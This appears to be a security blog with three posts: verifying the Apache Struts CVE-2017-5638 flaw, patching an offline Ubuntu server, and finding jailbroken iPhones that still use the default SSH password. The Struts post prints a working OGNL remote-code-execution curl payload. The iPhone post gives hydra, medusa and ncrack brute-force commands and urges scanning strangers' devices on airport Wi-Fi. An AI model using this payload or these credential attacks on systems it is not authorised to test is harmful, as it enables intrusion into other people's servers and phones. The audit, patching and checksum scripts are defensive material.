Friday, July 21, 2017

How to verify CVE-2017-5638 Apache Struts Jakarta Multipart Parser RCE

1.       Nessus Description

The version of Apache Struts running on the remote host is affected by a remote code execution vulnerability in the Jakarta Multipart parser due to improper handling of the Content-Type header. An unauthenticated, remote attacker can exploit this, via a specially crafted Content-Type header value in the HTTP request, to potentially execute arbitrary code, subject to the privileges of the web server user.


2.       Example of the vulnerable link


1) https://x.x.x.x:8443/service/login.action.


3.       Verification Steps

1)      The command below returns the output of the ifconfig command from the remote host:
curl --header "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','ipconfig','/all'}:{'bash','-c','ifconfig'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://x.x.x.x:8443/service/login.action  --insecure

           

4.       Metasploit module




5.       Recommendation

1)      Upgrade to Apache Struts version 2.3.32 / 2.5.10.1 or later.
2)      Alternatively, apply the workaround referenced in the vendor advisory.
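
A non-intrusive way to act on the recommendation above is to inventory the struts2-core jars on the server and compare them with the fixed releases. This is an added example, not part of the original post; it assumes jars keep the standard struts2-core-<version>.jar file name, relies on GNU sort -V, and applies only the upgrade thresholds quoted above (other branches are flagged for manual review).

```bash
#!/bin/sh
# Added example: audit deployed struts2-core jars against the fixed versions.

# Fixed releases named in the recommendation above.
FIXED_23="2.3.32"
FIXED_25="2.5.10.1"

# Exit 0 when version $1 sorts strictly before version $2 (GNU sort -V).
version_lt() {
    [ "$1" != "$2" ] &&
        [ "$(printf '%s\n%s\n' "$1" "$2" | sort -V | head -n 1)" = "$1" ]
}

# Classify one version string: UPGRADE, OK, or REVIEW for branches
# that the recommendation does not name.
classify_struts() {
    case "$1" in
        2.3|2.3.*)
            if version_lt "$1" "$FIXED_23"; then echo UPGRADE; else echo OK; fi ;;
        2.5|2.5.*)
            if version_lt "$1" "$FIXED_25"; then echo UPGRADE; else echo OK; fi ;;
        *)
            echo REVIEW ;;
    esac
}

# Walk a deployment tree (for example an application server's webapps
# directory) and print "<status> <version> <path>" for every jar found.
audit_struts_jars() {
    find "$1" -type f -name 'struts2-core-*.jar' | sort |
    while IFS= read -r jar; do
        ver=$(basename "$jar" .jar)
        ver=${ver#struts2-core-}
        printf '%s %s %s\n' "$(classify_struts "$ver")" "$ver" "$jar"
    done
}
```

Call audit_struts_jars with the directory that holds the deployed applications; any line starting with UPGRADE needs the fix from the recommendation.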

6.       References:

1)     https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1
2)     https://cwiki.apache.org/confluence/display/WW/S2-045
3)     http://www.securityfocus.com/bid/96729
4)     http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5638
5)     https://www.rapid7.com/db/modules/exploit/multi/http/struts2_content_type_ognl


Tuesday, May 9, 2017

Offline Update/Upgrade Ubuntu Server 16.04.2

Background:

The Ubuntu server is in the restricted zone that doesn’t have Internet access. It was built from image “ubuntu-16.04.2-server-amd64.iso” (http://releases.ubuntu.com/16.04.2/). Nessus Scan showed it has 2 critical, 12 high, 3 medium and 1 low risk vulnerabilities.
It needs to be patched and pass the Nessus Scan. Googling “offline ubuntu update” directed me to these links: https://help.ubuntu.com/community/AptGet/Offline and https://wiki.ubuntu.com/OfflineUpdateSpec. However, I tried all the methods that the documents mentioned, and for some reason they didn’t work for me:

  1. Synaptic and Keryx need a GUI and Ubuntu server doesn’t have one by default.
  2. The tool apt-offline needs to be installed on the offline server in order to use it. This is tricky because the offline server doesn’t have Internet access to apt-get install it.
  3. Not sure why but I couldn’t get apt-medium working on the Virtual Machine that I used to test the offline upgrade. It didn’t download any packages.

Solution:

After some research, the issue can be solved with a few command lines. The solution is based on the facts below:
  1. Ubuntu saves all the packages in folder /var/cache/apt/archives and the list in /var/lib/apt/lists after update/upgrade.
  2. The package index is saved in /etc/apt/sources.list file and in the /etc/apt/sources.list.d directory.
  3. Offline installation can use the command “sudo dpkg -i” followed by “sudo apt-get install -f”.
Requirement for Test Environment:
  1. Local Ubuntu Server 16.04.2 LTS without Internet Access.
  2. Remote machine that has Vmware or Virtual box and Internet access.
  3. Ubuntu Server 16.04.2 LTS image
  4. A USB key or a blank CD.
Steps:
1. Install an Ubuntu Server 16.04.2 LTS virtual machine on VMware or Virtual Box. 
2. (optional) Run command “sudo /usr/lib/update-notifier/apt-check” to check the available updates. The result is x;y (x = packages that can be updated, y = security updates).
 
3. Run below commands to patch the Ubuntu VM:
               sudo apt-get update
               sudo apt-get upgrade
               sudo apt-get dist-upgrade
4. (optional) you can run command “sudo /usr/lib/update-notifier/apt-check” to check the available updates again, it should be “0;0”.
5. Run below commands to create an offline repository.
              mkdir -p /tmp/offline/var/cache/apt/archives
              mkdir -p /tmp/offline/var/lib/apt/lists
              mkdir -p /tmp/offline/etc/apt
              mkdir -p /tmp/offline/etc/apt/sources.list.d
              sudo cp /var/cache/apt/archives/*.deb  /tmp/offline/var/cache/apt/archives
              # Might get warning message: cp: omitting directory '/var/lib/apt/lists/partial'
              # It can be ignored. 
              sudo cp /var/lib/apt/lists/*  /tmp/offline/var/lib/apt/lists
              sudo cp /etc/apt/sources.list /tmp/offline/etc/apt
              sudo cp -r /etc/apt/sources.list.d /tmp/offline/etc/apt/
              # Remove file /tmp/offline/var/lib/apt/lists/lock since it is not needed.
              sudo rm -f /tmp/offline/var/lib/apt/lists/lock
 
6. Copy /tmp/offline to a USB key or use mkisofs to generate an ISO file
 
7. Connect the USB key to the local Ubuntu Server that doesn’t have Internet. Mount the USB key and copy the offline folder to /tmp folder.
               sudo mkdir -p /mnt/usb
               sudo mount /dev/sdb1 /mnt/usb
               sudo cp -rf /mnt/usb/offline /tmp
 
8. Run below commands to build the repository. 
               sudo cp -f /tmp/offline/var/cache/apt/archives/* /var/cache/apt/archives/
               sudo cp -f /tmp/offline/var/lib/apt/lists/* /var/lib/apt/lists/
               sudo cp -f /tmp/offline/etc/apt/sources.list /etc/apt/sources.list
               sudo cp -f /tmp/offline/etc/apt/sources.list.d/* /etc/apt/sources.list.d/
9. Run below commands to patch the server:
               cd /var/cache/apt/archives/
               sudo dpkg -i *.deb
               sudo apt-get install -f -y
 
10. After the patch, the Nessus scan showed clean:
 
Note:
The steps above were tested on Ubuntu Server 16.04.2 LTS. Other versions of Ubuntu should work the same way, but this is not guaranteed.
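
The bundle travels on removable media and is installed with dpkg -i, which installs whatever .deb files it is given without apt's repository signature check, so it is worth confirming that nothing changed in transit. The following is an added example, not part of the original post; the manifest name SHA256SUMS and the two function names are assumptions, and it relies on the GNU find, sort, xargs and sha256sum found on Ubuntu.

```bash
#!/bin/sh
# Added example: integrity manifest for the /tmp/offline bundle.

# Online VM: record a SHA-256 for every file under the bundle directory $1.
make_manifest() {
    ( cd "$1" || exit 1
      find . -type f ! -name SHA256SUMS -print0 |
          sort -z | xargs -0 -r sha256sum > SHA256SUMS )
}

# Offline server: succeed only if every listed file is present and
# unmodified AND no file exists that the manifest does not list
# (an unlisted .deb would otherwise be picked up by "dpkg -i *.deb").
verify_manifest() {
    ( cd "$1" || exit 1
      [ -f SHA256SUMS ] || exit 1
      # Fails on any changed or missing file, or on an empty manifest.
      sha256sum -c SHA256SUMS >/dev/null 2>&1 || exit 1
      # Strip "<64 hex digits><space><mode char>" to get the listed paths.
      listed=$(sed 's/^[0-9a-f]\{64\} [ *]//' SHA256SUMS | sort)
      present=$(find . -type f ! -name SHA256SUMS | sort)
      [ "$listed" = "$present" ] )
}
```

Run make_manifest /tmp/offline on the online VM after step 5 and verify_manifest /tmp/offline on the offline server before step 8; if the USB key itself is not trusted, carry the hash of SHA256SUMS by a separate channel and compare it first.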


Friday, November 4, 2016

Scan a subnet to find out jailbreak iPhone with default password

After a jailbreak, most users will install OpenSSH on their iOS device. However, some users might not know to change the default password, or might simply forget. Below is the user list of an iPhone:



The default password of the username root and mobile is “alpine”.

So our goal is to scan a whole subnet and find out whether any jailbroken iOS devices accept an SSH login with the default username and password.

Tools: nmap (v7.01)  , hydra (v8.1) or medusa (v2.2) or ncrack (v0.4ALPHA).

1.     Connect your computer to the wireless network and find out the IP range: 192.168.1.9/24.

2.     Use nmap to generate a hosts list: nmap -sL 192.168.1.9/24 | grep "Nmap scan report" | awk '{print $NF}' > hosts.lst

3.     Or if you only want to scan the live hosts, you can use command: nmap -sP -n 192.168.1.9/24 | grep "Nmap scan report"| awk '{print $NF}' > liveHosts.lst

4.     Create 2 text files: username.txt and password.txt


5.     Run command: hydra -t 4 -L username.txt -P password.txt -M hosts.lst -s 22 ssh

6.     It took 12 minutes to get the password:


7.     Or you can use medusa: medusa -H liveHosts.lst -U username.txt -P password.txt -M ssh



8.     Ncrack also can do the job: ncrack -p ssh -U username.txt -P password.txt -iL liveHosts.lst --exclude 192.168.1.9. And you can press 'p' to list discovered credentials during the scan.

Following the steps above, you can easily modify the username and password file to perform a dictionary or brute force attack.

Ok, that’s it. Next time, you go to an airport, connect your Kali Linux to the free WIFI, have a cup of coffee and scan the whole subnet. You might be surprised. 

BTW, to change the password, just ssh to the iPhone with root and use command “passwd” and “passwd mobile”